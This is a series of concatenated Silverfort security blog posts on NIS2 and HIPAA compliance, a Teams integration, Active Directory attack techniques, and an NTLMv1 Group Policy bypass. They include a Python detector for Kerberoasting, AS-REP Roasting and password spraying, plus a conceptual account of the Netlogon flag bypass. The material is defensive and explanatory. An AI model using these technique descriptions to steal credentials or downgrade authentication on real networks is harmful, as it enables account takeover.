The “Detect” function in the Safeonweb@work initiative also includes multiple articles related to the field of identity. Unsurprisingly, these mirror quite neatly the recommendations that appeared in the “Protect” function. Aggregating event data (DE.AE-1 and 3) appears first and foremost as a “key” measure, with particular attention given to critical systems. This data should come from multiple sources, including physical access records and user/administrator reports. Organizations are particularly called upon to monitor critical systems for unauthorized local, network or remote connections (DE.CM-1), both from internal personnel and from external service providers (DE.CM-3, DE.CM-6 and DE.CM-7). These efforts imply surveillance tools at the network and endpoint level. Some might even suggest going a step further with comprehensive protection platforms encompassing access points and domain controllers, thereby combining EDR with ITDR. Overall, these measures reflect the requirements put forward in the “Protect” function against malicious activities (PR.DM and PR.MA), designed to block data leaks or damage.

### How can Silverfort help with NIS2 compliance?

Silverfort can help comply with many of these requirements. In just 1 month, and without any heavy changes to your infrastructure, our platform can:

PR.AC-1:
- Identify all privileged accounts across your multiple directories
- Audit all your service accounts and hybrid accounts
- Identify shadow admins
- Identify shared accounts
- Identify stale accounts
- Identify accounts with old passwords
- Protect access to critical systems, including legacy or on-prem systems, with MFA (compatible with Microsoft Authenticator, Okta, Ping, Duo, Yubico and more) or with dynamic risk-based policies

Figure: Silverfort's ITDR screen detects a Shadow Admin, highlighting hidden privileged access risks in real time.

PR.AC-3:
- Alert on or block any suspicious remote access attempt
- Protect remote access (RDP, SSH), command-line interfaces (PowerShell, PsExec, WMI), and SaaS or on-prem applications with MFA

PR.AC-4:
- Identify and monitor all generic and shared accounts
- Identify and monitor all authentications to file shares, servers, applications, databases, etc., even when on-prem
- Identify and monitor all privileged accounts, including shadow admins and domain administrators
- Detect and/or block all authentications breaching tiering principles (such as personal accounts or devices used for administrative tasks, or vice versa)
- Detect and/or block all authentications in breach of least privilege
- Apply adaptive conditional access policies for administrative accounts and tools that take geographic, timing or behavioural factors into account

PR.DS-5:
- Establish granular access policies for all critical systems and applications, even on-prem
- Monitor and block all malicious access to critical systems, including on-prem
- Audit Active Directory to detect privilege creep and misconfigurations

PR.DS-7:
- Block authentications that breach the integrity of the production or testing environments
- Restrict the privileges of administrative accounts to specific environments or applications

Figure: Example policy to stop lateral movement by implementing least privilege for remote management of Application X servers in PROD.

PR.MA-2:
- Monitor and restrict the access rights of external providers to specific environments or applications
- Protect remote access from external providers or partners with MFA
- Block all attempts to hijack external provider or partner accounts, and any unusual behaviour

Figure: Example policy in Silverfort to trigger MFA for Tier 1 accounts on remote access.

DE.AE-1:
- Log all Active Directory authentications, including their sources, destinations, protocols and timestamps
- Calculate a dynamic risk score for all Active Directory accounts and authentications

DE.CM-1:
- Detect and block any unauthorized authentication in Active Directory or in any other compatible directory (PAM, RADIUS, Entra ID, Okta, Ping...)
- Detect and alert when human or service accounts display unusual behaviour

DE.CM-7:
- Detect and block any unauthorized personnel access to critical systems
- Detect and block any unauthorized software access to critical systems

### Is it worth exceeding expectations?

Often, the Safeonweb@work initiative suggests additional measures that would contribute to securing information systems (through the regular use of the word “Consider”), without necessarily making them compulsory. It also omits some simple and common hygiene measures that other agencies, such as the ANSSI in France, have insisted upon more forcefully. In this category, we can mention the tiering of critical systems or users. The CCB requires using separate accounts for personal and administrative tasks (PR.AC-4) as well as network segmentation (PR.AC-5). But it does not mandate dedicated workstations (PAWs) or operating systems for administrative actions, which would help avoid certain kinds of attacks such as Pass-the-Hash. Another example: the CCB recommends using service accounts for automated processes (PR.AC-1). However, it does not forbid administrators from running automated tasks using their own accounts, nor does it prohibit using service accounts for actions that deviate from their intended purpose. These might be missed opportunities for Belgian organizations, particularly “essential” entities under NIS2, which future attackers might successfully exploit. The CCB clearly tried to weigh the security benefits against the financial or operational costs involved in each decision it made. The result remains nonetheless robust, and clearly raises the bar for many local organizations which had hitherto neglected their security posture.
However, it will not immunize the country against the more sophisticated cyber attacks which have multiplied in recent years.

Want to learn more about how Silverfort can help you address the identity security aspects of NIS2? Schedule a call with one of our experts or fill out this form for a pricing quote.

---
- Published: 2025-02-03
- Modified: 2025-04-02
- URL: https://www.silverfort.com/blog/a-critical-step-forward-for-healthcare-breaking-down-the-proposed-hipaa-security-rule-framework-updates/

Healthcare is one of the sectors most targeted by malicious actors, with the number of breaches growing consistently year on year. Despite the common security risks affecting healthcare environments and numerous headline-hitting data breaches, healthcare remains under-resourced to defend against the increasing number of cyberattacks.

In early January 2025, a set of updates to the HIPAA Security Rule framework was proposed to provide more granular security regulations. This is a much-needed change for the industry, as it will force every healthcare organization to address its security risks head-on. But let’s be honest: while the proposed changes to HIPAA are a step in the right direction, they are far from a complete solution, and many of the new guidelines will challenge under-resourced organizations to comply.

### Why is the HIPAA framework adding new regulations?

The HIPAA Security Rule has undergone a few major revisions since its inception, with the most recent occurring in the early 2000s. Since then, only minor updates have been applied to the framework, none of which moved the proverbial needle from a security perspective. Furthermore, the current HIPAA security guidelines were more recommendations than requirements. In short, it was time for an overhaul of the security guidelines, especially where they related to identity security.

It's also worth noting that the updates didn’t come out of nowhere: they were a direct response to the growing number of attacks in the healthcare industry in recent years. The common denominator of attacks in this sector was the use of compromised credentials and undetected lateral movement. As a result of these continuous and successful breaches of healthcare providers, the HIPAA regulators came out with a strong and clear message: enough is enough. These new proposed guidelines aim to tackle the sector’s lack of security controls and posture. They’re also a serious reality check for an industry struggling to keep up with security best practices.

### Key proposed changes to the HIPAA framework

On January 6th, 2025, the Department of Health and Human Services (HHS) unveiled a comprehensive proposal for updating the HIPAA framework, marking a significant step towards enhancing the security and privacy of electronic protected health information (ePHI). According to OCR’s announcement, the proposed rule seeks to “improve cybersecurity and better protect the U.S. healthcare system from a growing number of cyberattacks” and “better align the Security Rule with modern best practices in cybersecurity.” Let's take a closer look at the proposed guidelines that specifically address identity security in the updated HIPAA Security Rule framework.

#### 1. Compromised credentials and MFA

For all access points to electronic protected health information (ePHI), organizations will be required to implement MFA protection. This measure aims to mitigate the risks associated with compromised credentials, reducing unauthorized access.

#### 2. Incident response

Following the proposed updates, all policies, procedures, plans and analyses related to incident response must be documented in writing. Covered entities must develop a comprehensive incident response plan, including procedures for reporting incidents and restoring systems within 72 hours of a breach. Additionally, organizations must conduct annual security testing to ensure the effectiveness of the organization's security controls.

#### 3. Risk analysis

For security risk analyses, the HHS proposed more detailed requirements, which include maintaining a written assessment that reviews an asset inventory and network map, identifies potential threats to protected health information (PHI), and evaluates each threat's risk level. Organizations will benefit from this proactive approach by better understanding and mitigating security threats and risks.

#### 4. Asset inventory

Healthcare organizations will be required to develop an asset inventory and network map that tracks the movement of ePHI throughout their systems. This comprehensive mapping requirement will help identify misconfigurations and security risks, ensuring all assets are adequately secured against unauthorized access.

#### 5. Encryption

All PHI must be encrypted both at rest and in transit, reflecting a shift towards mandatory encryption practices rather than optional recommendations. This change highlights the critical importance of securing sensitive patient information from unauthorized access during storage and transmission.

#### 6. Vulnerability scanning and penetration testing

Organizations will need to conduct vulnerability scans every six months and perform penetration testing at least once a year. These assessments will be crucial for identifying weaknesses in security measures before they can be exploited by malicious actors.

#### 7. Compliance audits

Covered entities must conduct a compliance audit at least once a year to verify that technical controls are implemented effectively. Organizations must document this audit to prove that they have adhered to the updated security standards.

#### 8. Security awareness training

The proposed rule includes new training requirements for workforce members regarding identifying and reporting security incidents, securely accessing electronic systems, and understanding HIPAA policies. Training must be completed within 30 days of being granted access to IT systems and must be renewed annually.

### The hard truth for healthcare organizations

As significant as these updates are, they also highlight the challenges faced by under-resourced healthcare providers. Complying with these regulations requires the right amount of resources (IT team and investment) in technology and processes, which many healthcare providers struggle with. Non-compliance with HIPAA’s newly proposed framework could lead to regulatory penalties as well as the fallout from a security breach. By implementing stronger security controls and enhancing their overall security posture, healthcare organizations can take proactive steps to align with HIPAA's proposed new security guidelines, which call for more stringent and extensive security measures.

### A proactive security approach will lead to easier compliance

The proposed changes to the HIPAA framework are a necessary step toward helping the healthcare industry in its fight against cybercriminals. By addressing the different security risks and threats in the sector, HIPAA is providing a clear roadmap for reducing risk. However, achieving compliance will require significant effort, particularly for under-resourced organizations. Healthcare providers must take a proactive approach to security and act now to align with these changes, ensuring they are not only compliant but also resilient.

Want to learn more about how Silverfort can assist you in complying with HIPAA requirements? Schedule a call with one of our experts or watch our on-demand webinar to make sure your organization is prepared, protected, and compliant.
---
- Published: 2025-01-28
- Modified: 2025-06-16
- URL: https://www.silverfort.com/blog/microsoft-teams-and-silverfort-bridging-authentication-and-enhancing-identity-incident-visibility/

While hybrid environments are the new norm, they bring with them a unique set of security challenges, like fragmented systems, siloed authentication flows, and sub-optimal end-user experiences. As a result, enforcing security controls turns into a daunting task – even for the most advanced organizations. In this blog, we’ll explore how Silverfort’s integration with Microsoft Teams addresses the challenge of securing hybrid environments with enhanced visibility capabilities and real-time alerts on any authentication request in your environment.

### Why end-to-end visibility is essential for security teams

On-prem resources and cloud applications are often siloed, which creates operational bottlenecks for security teams and makes it even more difficult to secure all authentication flows. Not managing both environments correctly can increase the risk of exposed passwords, potentially leading to misuse and credential compromise. To mitigate these risks, organizations must strike a balance between strong security controls and operational efficiency. Enforcing effective security controls while maintaining a frictionless end-user experience is no mean feat. Luckily, there are things you can do to make it easier.

Firstly, a proactive approach to visibility, with centralized monitoring of all authentications and other user activities at its core, is vital to enforcing strong access policies across your organization – and to detecting any malicious threats before they can become an issue. Furthermore, organizations need real-time alerts for high-risk incidents, or they risk delaying the incident response process. Without these timely notifications, security teams may not become aware of any malicious activity until the damage has been done.

### No more risk visibility blind spots for security teams

#### Silverfort Authenticator for Microsoft Teams

Silverfort customers can now use the Microsoft Teams application to securely approve authentication requests, providing an alternative to the Silverfort MFA desktop application. Use our SSO bridging functionality to receive real-time alerts for all authentication requests in your hybrid environment without installing the Silverfort desktop application on your workstations. With enhanced authentication flows through Silverfort, you’ll get efficient, streamlined access to any resource within your defined access policies.

In addition to bridging identity flows, the Silverfort Authenticator app for Microsoft Teams enables users to authenticate using FIDO2 tokens, One-Time Passwords (OTP), and Just-in-Time (JIT) access requests for privileged accounts. These extended capabilities allow users to securely approve access directly within Microsoft Teams, reducing the dependency on the Silverfort Desktop Application.

#### How does Silverfort Authenticator for Microsoft Teams work?

Video: Example of a real-time alert for an authentication request in your hybrid environment, sent through the Silverfort Authenticator App in Microsoft Teams.

Silverfort embeds Identity Bridge flows, FIDO2, OTP and JIT authentications directly into the Microsoft Teams environment and seamlessly bridges any type of authentication request. When an Identity Bridge policy is triggered, the Silverfort Authenticator app in Teams opens a browser to initiate the SSO request that verifies the user’s identity. After the user accepts the request, the bridge session is established, and the user gains secure access to a specific resource within the organization’s environment.

When FIDO2 or OTP-based policies are triggered, users will see a corresponding prompt within Microsoft Teams to complete verification with the configured method. For privileged accounts secured by JIT access policies, Teams delivers a just-in-time approval request to verify access at the time of need. These authentication events are securely processed within the Microsoft Teams chat interface, using Silverfort’s centralized policy enforcement engine.

#### Silverfort’s risk and incident notifications for Microsoft Teams

Silverfort’s risk and incident notifications integration with Microsoft Teams offers security teams real-time, end-to-end visibility into security events happening in your environment, based on our analysis. This integration allows you to receive real-time alerts in your Microsoft Teams app on security events with different risk levels, including new incident detections and changes to entity risk levels. With Silverfort for Microsoft Teams, you gain all the insights necessary for a rapid, informed risk prioritization and mitigation process.

#### How does Silverfort’s risk and incident notifications integration with Microsoft Teams work?

To set up this integration, you will need to configure Microsoft Teams to accept incoming webhooks and adjust your Silverfort settings to send notifications based on pre-defined risk levels. With this configuration, Silverfort will push notifications to Teams whenever critical events occur in your environment. In these notifications, you will see detailed information about the incident that will help you quickly assess and respond to critical threats.

Screenshots: Examples of real-time alerts sent in response to various events or triggers. These notifications are tailored to the specific circumstances of each event.

### A new approach to bridging authentication flows and incident visibility

Silverfort’s integrations with Microsoft Teams open new possibilities for organizations to maintain and secure their hybrid environments. With authentication flow bridging and real-time alerts embedded directly into Teams, security teams can stay one step ahead of potential security threats and enforce strong security controls while keeping a seamless end-user experience.

Looking to learn how you can enforce identity controls in your hybrid environment? Schedule a call with one of our experts.

---
- Published: 2025-01-20
- Modified: 2025-07-10
- URL: https://www.silverfort.com/blog/navigating-the-five-eyes-alliances-guide-to-detecting-and-mitigating-active-directory-compromises/

The Five Eyes Alliance, led by the Australian Signals Directorate (ASD), recently released a key document titled Detecting and Mitigating Active Directory Compromises, highlighting the rise in ransomware attacks on Active Directory environments, especially in the APAC region. In this blog, we'll examine some of the most common compromises described in the guidance, and highlight how Silverfort can help.

### What is the Detecting and Mitigating Active Directory Compromises Guidance?

The guidance on Detecting and Mitigating Active Directory Compromises outlines common tactics, techniques, and procedures (TTPs) used by attackers to breach Active Directory infrastructure, and provides mitigation strategies. This guidance is a timely response to the growing reliance on identity threats in ransomware attacks in APAC, including some notable breaches:

#### The MediSecure Ransomware Attack (November 2023, Revealed July 2024)

MediSecure, a digital prescription company based in Australia, experienced a ransomware attack last year that exposed the health and personal information of nearly 13 million people. This also resulted in the company filing for insolvency.
The breach appeared to originate from one of MediSecure's third-party vendors, suggesting the attackers may have gained access to MediSecure's data using compromised credentials.

#### Port of Nagoya Ransomware Attack (July 2023)

An attack attributed to the LockBit group disrupted trade and logistics in the Port of Nagoya, the busiest shipping port in Japan - a major hub for car exports and an important engine for the Japanese economy. Two days were lost to the attack, which restricted the port's ability to receive shipping containers. While it has not been publicly disclosed how LockBit gained initial access, their ransomware strategy is typically based on phishing emails and purchasing stolen credentials. As soon as they gain access to the network, they move laterally, extract additional credentials, escalate privileges, broaden their access, and encrypt critical data. In this case, the Nagoya United Terminal System (NUTS), which manages container operations, was compromised. The ransom note left by the attackers claimed that data from NUTS had been encrypted, and a ransom was demanded.

#### The ICBC Attack (November 2023)

The Industrial and Commercial Bank of China (ICBC), the world’s largest lender by assets, was hit by a ransomware attack directed at the bank's financial services division, U.S. ICBC Financial Services. It was reported that the attack had caused major disruptions to Treasury trades. According to reports, the attackers gained unauthorized access to ICBC by exploiting a Citrix NetScaler ADC and NetScaler Gateway vulnerability named "Citrix Bleed". Exploitation of this vulnerability, warns CISA (the US Cybersecurity and Infrastructure Security Agency), "could allow for the disclosure of sensitive information, including session authentication token information that may allow a threat actor to 'hijack' a user’s session".

### Common AD Compromises Outlined in the Guidance

While the guidance outlines over 15 AD-related compromises, we’ll focus on some of the more common ones, namely Kerberoasting, AS-REP Roasting, Password Spraying, Unconstrained Delegation, and AD CS Compromise.

#### Kerberoasting

What is Kerberoasting? Kerberoasting is an attack that exploits the Kerberos authentication protocol. Specifically, Kerberoasting targets service accounts, exploiting the fact that any authenticated user can request Ticket Granting Service (TGS) tickets for any service. Attackers request TGS tickets associated with Service Principal Names (SPNs), then crack the encrypted tickets offline to obtain passwords. In this way, they can access restricted areas without being detected.

How Silverfort Helps Detect and Protect Against Kerberoasting in Real Time

Detection:
- Track service requests to users with SPNs, and detect Kerberoasting attacks using anomaly detection.
- Monitor suspicious MFA denials and virtual fencing violations to detect compromised credentials.

Real-Time Protection:
- Automatically deny service ticket requests identified as Kerberoasting.
- Enforce MFA policies for human accounts and virtual fencing for service accounts to prevent identity compromise.

Figure: Overview of Kerberoasting (Source: Detecting and Mitigating Microsoft Active Directory Compromises)

#### AS-REP Roasting

What is AS-REP Roasting? Authentication Server Response (AS-REP) Roasting is an attack method targeted at user objects configured not to require Kerberos pre-authentication. If an attacker manages to crack an AS-REP ticket encrypted with a user's password hash, they can obtain the user's cleartext password and authenticate as the user.

How Silverfort Helps Detect and Protect Against AS-REP Roasting in Real Time

Detection:
- Silverfort detects AS-REP requests without pre-authentication and flags suspicious authentication attempts.
- Monitor suspicious patterns of MFA denials and virtual fencing violations to detect successful AS-REP Roasting attempts.
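The detection bullets above describe the signal shape for Kerberoasting (one account requesting tickets for many SPNs in a burst) and AS-REP Roasting (AS requests with no pre-authentication). As an added example, not Silverfort's code and not taken from the guidance, the following Python implements both as rules over constructed, key=value-style Windows Security event lines (4769, 4768 and 4625), and generalizes the same "one actor, many distinct targets" window to the password spraying case discussed further on. All accounts, SPNs, hosts and IP addresses are hypothetical.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines in a flattened Windows Security event style (not real
# captures). 4769 = Kerberos service ticket (TGS) request, 4768 = Kerberos
# authentication (AS) request, 4625 = failed logon. etype 0x17 is RC4-HMAC,
# 0x12 is AES256; preauth=0 means the AS request carried no pre-authentication.
SAMPLE_LOG = """\
2025-01-20T10:00:01 id=4769 account=jdoe service=MSSQLSvc/db01.corp.example etype=0x17 ip=10.0.0.5
2025-01-20T10:00:02 id=4769 account=jdoe service=HTTP/intranet.corp.example etype=0x17 ip=10.0.0.5
2025-01-20T10:00:02 id=4769 account=jdoe service=MSSQLSvc/db02.corp.example etype=0x17 ip=10.0.0.5
2025-01-20T10:00:03 id=4769 account=jdoe service=CIFS/files01.corp.example etype=0x17 ip=10.0.0.5
2025-01-20T10:00:03 id=4769 account=jdoe service=exchangeMDB/mail01.corp.example etype=0x17 ip=10.0.0.5
2025-01-20T10:00:04 id=4769 account=asmith service=CIFS/files01.corp.example etype=0x12 ip=10.0.0.9
2025-01-20T10:05:00 id=4768 account=svc-legacy preauth=0 ip=10.0.0.5
2025-01-20T10:05:01 id=4768 account=svc-print preauth=0 ip=10.0.0.5
2025-01-20T10:05:01 id=4768 account=asmith preauth=2 ip=10.0.0.9
2025-01-20T10:10:00 id=4625 account=bjones ip=10.0.0.77
2025-01-20T10:10:01 id=4625 account=cwu ip=10.0.0.77
2025-01-20T10:10:01 id=4625 account=dlee ip=10.0.0.77
2025-01-20T10:10:02 id=4625 account=efox ip=10.0.0.77
2025-01-20T10:10:02 id=4625 account=ghill ip=10.0.0.77
2025-01-20T10:10:03 id=4625 account=asmith ip=10.0.0.9
"""


def parse_line(line: str) -> dict:
    """Turn '<iso-timestamp> k=v k=v ...' into a dict with a datetime 'time'."""
    ts, _, rest = line.partition(" ")
    event = {"time": datetime.fromisoformat(ts)}
    for token in rest.split():
        key, _, value = token.partition("=")
        event[key] = value
    return event


def fanout_alerts(events, actor_key, target_key, window, threshold):
    """Generic 'one actor, many distinct targets' detector over a sliding time
    window. Emits one (actor, sorted targets) tuple per actor, the first time
    the number of distinct targets inside the window reaches the threshold."""
    recent = defaultdict(deque)   # actor -> deque of (time, target)
    alerted, alerts = set(), []
    for ev in events:              # events are assumed to be in time order
        actor, target = ev.get(actor_key), ev.get(target_key)
        if actor is None or target is None:
            continue
        q = recent[actor]
        q.append((ev["time"], target))
        while q and ev["time"] - q[0][0] > window:
            q.popleft()
        distinct = {t for _, t in q}
        if len(distinct) >= threshold and actor not in alerted:
            alerted.add(actor)
            alerts.append((actor, sorted(distinct)))
    return alerts


def detect(log_text: str, window: timedelta = timedelta(seconds=60)) -> dict:
    """Run the three identity detections over a log and return the findings."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    by_id = defaultdict(list)
    for ev in events:
        by_id[ev.get("id")].append(ev)
    # Kerberoasting: one account pulling service tickets for many SPNs in a
    # burst. RC4 (0x17) requesters are listed too, since a downgrade to RC4
    # is the classic tell that the tickets are meant for offline cracking.
    roast = fanout_alerts(by_id["4769"], "account", "service", window, 4)
    rc4 = sorted({ev["account"] for ev in by_id["4769"] if ev.get("etype") == "0x17"})
    # AS-REP Roasting: every AS request without pre-authentication is flagged
    # on its own, because each response can be cracked offline.
    asrep = [(ev["account"], ev["ip"]) for ev in by_id["4768"] if ev.get("preauth") == "0"]
    # Password spraying: one source address failing against many accounts.
    spray = fanout_alerts(by_id["4625"], "ip", "account", window, 5)
    return {"kerberoasting": roast, "rc4_tgs_requesters": rc4,
            "asrep_roasting": asrep, "password_spraying": spray}


if __name__ == "__main__":
    for name, hits in detect(SAMPLE_LOG).items():
        print(f"{name}: {hits}")
```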
Real-Time Protection:
- Set MFA policies for human accounts and virtual fencing for service accounts to defend against AS-REP Roasting.
- Automatically deny authentications without pre-authentication.

Figure: Overview of AS-REP Roasting (Source: Detecting and Mitigating Microsoft Active Directory Compromises)

#### Password Spraying

What is Password Spraying? In password spraying, attackers attempt to authenticate to multiple users using different combinations of passwords until they succeed. These passwords can come from public password lists, be identified as reused in the target environment, or simply be the same password tried on multiple accounts.

How Silverfort Helps Detect and Protect Against Password Spraying in Real Time

Detection:
- Detect brute-force attempts by tracking repeated authentication failures across multiple accounts.
- Monitor unusual activity involving built-in admin accounts, which are common targets for password spraying attempts.
- Monitor enumeration of multiple SMB resources, a technique often used to discover credentials in unprotected file shares.

Real-Time Protection: The guidance describes MFA as an effective way to mitigate password spraying when attackers try to gain initial access, but once they've already gained access, it isn't as effective, because they can then authenticate directly to the Domain Controller (DC) with the NTLM protocol, which does not support MFA. While it is true that NTLM does not support MFA, that doesn't mean there is no way around it. Actually, there is, and it is part of our integration with Active Directory. Without requiring any changes, AD forwards every access request to us for a second opinion. This allows us to enforce MFA verification on any resource that uses AD, including legacy systems and on-prem infrastructure that use NTLM.
- Secure human accounts by implementing MFA, and service accounts with virtual fencing.
- Reduce the use of NTLM wherever possible, as well as NTLMv1, LDAP, and other weak protocols.
- Enforce MFA verification policies for legacy protocols such as NTLM.

#### Unconstrained Delegation

What is Unconstrained Delegation? With unconstrained delegation, a computer object can impersonate any authenticated user and access any service. When a user object authenticates to a computer object with unconstrained delegation, a copy of the user's TGT is stored locally. If an attacker gains local admin access to a computer configured for unconstrained delegation, they can extract the TGTs of any user object that has previously authenticated to the computer object. The attacker can then use these TGTs to impersonate other user objects in the domain, including domain admins.

How Silverfort Helps Detect and Protect Against Unconstrained Delegation in Real Time

Detection:
- Users' TGTs can be stolen if they authenticate to computers configured with unconstrained delegation. Use Deny/Notify/MFA policies to monitor computers with unconstrained delegation for suspicious MFA denials and virtual fencing violations.

Real-Time Protection:
- Set up a Deny/MFA policy for authentications to computers with unconstrained delegation.
- Enforce MFA policies for human accounts and fencing for service accounts to prevent identity compromise.

#### AD CS Compromise

What is an AD CS Compromise? AD CS (Active Directory Certificate Services) is used for the issuance and management of Public Key Infrastructure (PKI) certificates, which are commonly used for authentication purposes (as well as for other purposes, such as encryption and digital signing of documents, but this is not related to our topic). The AD CS Certificate Authority (CA) offers a variety of certificate templates to help users and computers obtain certificates for various uses. One of the most common AD CS compromises is exploiting misconfigured templates like ESC1. The ESC1 template allows any user to request a certificate on behalf of any other user. In this way, attackers are able to authenticate as that user and inherit their privileges.

How Silverfort Helps Detect and Protect Against AD CS Compromises in Real Time

Detection:
- Silverfort monitors for suspicious authentications, specifically TGT requests in which a certificate was used.

Real-Time Protection:
- If certificate-based authentication is not widely used in your organization, limit its usage with a deny policy.
- Ensure MFA is enabled on human accounts and virtual fencing is enabled on service accounts.

### What's Next?

The good news is that despite all the darkness, there is light, and all these compromises are indeed detectable and mitigable. For each attack, there's a detailed counter-strategy, including limiting privileged access, enforcing strong authentication practices, and minimizing the risks of legacy protocols. Bottom line, dealing with Active Directory threats requires direct and active measures. It's all about identifying and preventing the mechanisms attackers use. Did anyone say "detecting and mitigating"?

---
- Published: 2025-01-16
- Modified: 2025-04-01
- URL: https://www.silverfort.com/blog/ntlmv1-bypass-in-active-directory-technical-deep-dive/

Silverfort discovers that an Active Directory Group Policy designed to disable NTLMv1 is easily bypassed due to a simple misconfiguration, allowing NTLMv1 authentications to persist.

### TL;DR

News: Silverfort’s research team discovered a new way for attackers to use NTLMv1 in attacks, despite efforts to disable it. Using a misconfiguration in on-prem applications, attackers can bypass the Group Policy designed to stop NTLMv1 authentications.

Why it matters: 64% of Active Directory user accounts regularly authenticate with NTLM, despite its known weaknesses and its deprecation by Microsoft. Many organizations attempted to solve the NTLMv1 problem with an Active Directory Group Policy.
However, we discovered that this policy is flawed and allows NLTMv1 authentications to persist, creating a false sense of security and leaving organizations vulnerable. Attackers know NTLMv1 is a weak authentication protocol and actively seek it out as a method to move laterally or escalate privileges.   Who’s affected: Any organization who uses third-party or home-grown on-prem applications and those who do not strictly use Windows machines. For example, if a Mac computer connects to a bank application, they could be compromised. Impact to organizations: An attacker sitting on a network can see the NTLMv1 traffic and crack the users' credentials offline, leading to lateral movement and privilege escalation. Our POC emulates an application bypassing the fencing, validating this misconfiguration works to an attacker’s advantage.   Result of disclosure: While Microsoft Security Response Center (MSRC) indicated the NTLMv1 bypass is not a vulnerability, they took proactive measures to enhance security by announcing the complete removal of NTLMv1 within two months of our disclosure, starting with Windows 11 version 24H2 and Windows Server 2025.   We recently hosted a webinar where I took people through the research in more detail, showing how to mitigate NTLMv1 authentications in the absence of a patch. You can watch this webinar on demand here. Summary & Mitigations  Despite its historical significance, NTLM represents a considerable security liability. Its outdated cryptographic methods, well-documented weaknesses and lack of modern security features (such as MFA and server identity validation) make it an attractive target for attackers. NTLMv1 hashes can be intercepted and used for authentication relay attacks or even dictionary attacks, granting attackers unauthorized access to sensitive systems. New NTLM vulnerabilities have been disclosed over the last few months, including a zero-day. 
More recently, CyberSky discovered an NTLM vulnerability exploited by Russian threat actors as part of an attack chain that delivers the open-source Spark RAT malware. Many organizations proactively use Microsoft’s Group Policy mechanism to stop NTLMv1, believing this will protect them from insecure NTLMv1 authentications. However, our research shows on-prem applications can be configured to enable NTLMv1, negating the Group Policy LAN Manager’s highest authentication level set in Active Directory. Organizations think they are doing the right thing by setting this group policy, but it’s still being bypassed by the misconfigured application. Until applications cannot be configured to authenticate with NTLMv1, the problem will persist. At Silverfort, we’ve seen many attempts to authenticate via NTLMv1 across our customer base. We work closely with our customers to map and detect NTLMv1 usage and apply risk-based fencing to reduce the risk of compromise. Without a patch for NLTMv1, businesses that used NTLMv1 in the past should consider the following: Enable audit logs for all NTLM authentications in the domain.   Map all applications that use NTLM authentications in the first instance or as a fall back.   Detect vulnerable applications that request clients use NTLMv1 messages.   Fence all NTLM with a modern authentication method.   Technical deep dive: NTLMv1 bypass in Active Directory  NTLM (NT LAN Manager) is an old but widely used authentication mechanism commonly seen in Windows-based environments. Developed by Microsoft in the early 1990s, it was once the standard for authenticating users across a network, especially Microsoft’s Active Directory. However, despite being largely replaced by more secure protocols like Kerberos, NTLM continues to linger in legacy systems due to backward compatibility requirements. 
Measures were taken over the years to encourage the use of newer, more secure forms of authentication, such as blocking legacy NTLMv1 across the entire domain. In December 2024, Microsoft announced the deprecation of NTLM, ending its active development. Even with these changes, questions remain. Do these actions create a more secure environment? Are we really getting closer to a complete removal of NTLMv1? Let's dive into the technical details.

#### NTLM 101

NTLM is an authentication mechanism used to verify a user's identity in Windows-based systems. NTLM consists of three messages: Negotiate, Challenge and Authenticate. The process begins with the client sending a Negotiate message to the server, indicating its intent to use NTLM for authentication and providing information about supported authentication options. The server then responds with a Challenge message, which includes a random number (the challenge) for the client to hash using its credentials. The client then sends the hashed response back to the server in the Authenticate message, which also includes the client's username, domain and session information. The server validates the response and, if successful, grants access to the requested resource. NTLM is often used as the underlying authentication mechanism in higher-level protocols like SMB (Server Message Block) or HTTP. While NTLM is a standalone authentication protocol, it is often referred to as a “mechanism” because it is frequently implemented as part of other protocols or systems to provide authentication.

Figure 1: Simple NTLM Authentication

#### NTLMv1 vs NTLMv2

NTLMv1 was first introduced in 1993. Security awareness at this time was low, and NTLM was designed accordingly. Encryption, the first security mechanism, was in its infancy and only DES was supported. The second mechanism, the challenge, consisted of only an 8-byte server challenge.
Such a small number of random bytes made it easier to break the cipher and recover the user’s credentials. The last mechanism missing in the first version of NTLM was any specification of the source and destination of the NTLM authentication. This very quickly led to the infamous NTLM Relay attack method, which positions the adversary between the client and the server. If an NTLMv1 message was caught, it could then be used to reauthenticate the adversary to the application and even be reused with a different protocol, for example by transitioning NTLM authentication over SMB to NTLM over LDAP.

The second version of NTLM – NTLMv2 – introduced mitigations for many of the security weaknesses detailed above. The first was the upgrade of the encryption method with the use of RC4, which strengthened the cipher and made it harder to brute-force. The second was the addition of the Client Challenge, which added another source of entropy to the computation of the cipher. The last and biggest modification to NTLM was the AV_PAIRS. This added extra fields to the NTLM Authenticate message, such as source client, destination server, domain and even SPN; these are a few of the fields that create a unique session key for every authentication. This protection made it difficult to perform relay attacks.

#### Netlogon to evaluate NTLM

The last piece of the puzzle is that the application server in Active Directory cannot evaluate the NTLM message on its own, simply because it does not have the user’s credentials stored. Instead, Microsoft uses the RPC Netlogon interface to evaluate the NTLM message remotely. The server must attach the NTLM message to the NetrLogonSamLogonEx function alongside the NTLM challenges. If the Domain Controller successfully recreates the message using the user’s stored credentials, it returns success together with the user’s Privilege Access Certificate (PAC), which the server uses to perform authorization, and a matching session key.
If the evaluation fails, it responds with the corresponding error.

Figure 2: NTLM Authentication in Active Directory

#### NTLMv1 disclosure

The Group Policy mechanism is Microsoft’s solution to disable NTLMv1 across the network. The LMCompatibilityLevel registry key prevents the Domain Controllers from evaluating NTLMv1 messages and returns a wrong password error (0xC000006A) when authenticating with NTLMv1. This should eliminate NTLMv1 completely and require all application servers to provide NTLMv2. Does this eliminate NTLMv1? Let’s take a look.

Figure 3: Reject NTLMv1 with GP enabled

#### NTLMv1 bypass

MS-NRPC is the specification of the Netlogon remote interface, which describes all of its structures and functions. NetrLogonSamLogon and its variants (NetrLogonSamLogonEx and NetrLogonSamLogonWithFlags) oversee passing the NTLM message from the server to the Domain Controller securely for evaluation. The function structure requires identity information to be passed alongside the NTLM message. As defined in section 2.2.1.4.15, the NETLOGON_LOGON_IDENTITY_INFO contains many fields such as domain name, username, workstation, and others. One interesting field is ParameterControl. If we look at its flags, we can see that the O value states, “Allow NTLMv1 authentication (MS-NLMP) when only NTLMv2 (NTLM) is allowed.”

Figure 4: A screenshot of the MS-NRPC documentation, ParameterControl flag, page 65.

I wondered whether Microsoft really allows applications to use NTLMv1 when it is disabled. After building the data structure and simulating a malicious application, I discovered that this flag bypasses the Group Policy that prevents using NTLMv1 authentication across the network.

Figure 5: Bypass the NTLMv1 Group Policy.

